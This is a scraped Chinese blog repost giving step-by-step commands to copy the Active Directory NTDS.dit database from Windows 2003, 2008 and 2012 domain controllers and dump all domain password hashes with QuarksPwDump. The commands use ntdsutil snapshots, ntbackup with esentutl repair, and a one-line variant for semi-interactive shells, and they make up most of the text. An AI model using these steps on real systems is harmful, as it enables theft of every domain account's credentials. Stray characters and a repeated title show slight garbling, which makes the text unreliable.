windows 2003 windows 2008 windows 2012 导出域控hash的方法

标签：ida   overwrite   body   sed   log   hub   tin   database   snap   quarkspwdump作者介绍的用法： 1. Windows 2008       Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make   filesystem snapshots while the operating is running and writing to current backuped files.       Here is a way to backup NTDS.dit file while a domain controller is running:       #ntdsutil   #snapshot   #activate instance ntds   #create   #mount {GUID}   #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit   #unmount {GUID}   #quit   #quit       If AD server hasn‘t the "AD DS role", you have to use dsdbutil.exe command in the same way.              2. Windows 2003     On this version, VSS has been implemented but not NTDS-type snapshots.   But you can use ntbackup tool, here is the procedure:       - Launch NTBACKUP gui   - Use backup wizard (advanced)   - Choose to save system state only and choose output filename   - Wait some minutes   - Use restore wizard (advanced)   - Choise your backup, click next and use advanced button   - Choose to restore file on another location (c:\tmp\ for example)   - Choose to overwrite everything and next uncheck all restoration parameters   - Validate and wait some minutes   - Open a command shell to "c:\tmp\Active Directory"   - We need to repair the database with this command   #esentutl /p ntds.dit   - Validate warning and wait some minutes       ntds.dit file can now be used with quarkspwdump.   其中 #ntdsutil #snapshot #activate instance ntds #create #mount {GUID} #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit #unmount {GUID} #quit #quit 适用于可交互式或直接登录状态。 如果是半交互式的，可以采用如下方法（网上看到的用法）： ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit ntdsutil snapshot "unmount {GUID}" quit quit2 v- p5 I2 O E ntdsutil snapshot "delete {GUID}" quit quit   最后 QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit  windows 2003 windows 2008 windows 2012 导出域控hash的方法标签：ida   overwrite   body   sed   log   hub   tin   database   snap   原文地址：http://www.cnblogs.com/landuo11/p/7492458.html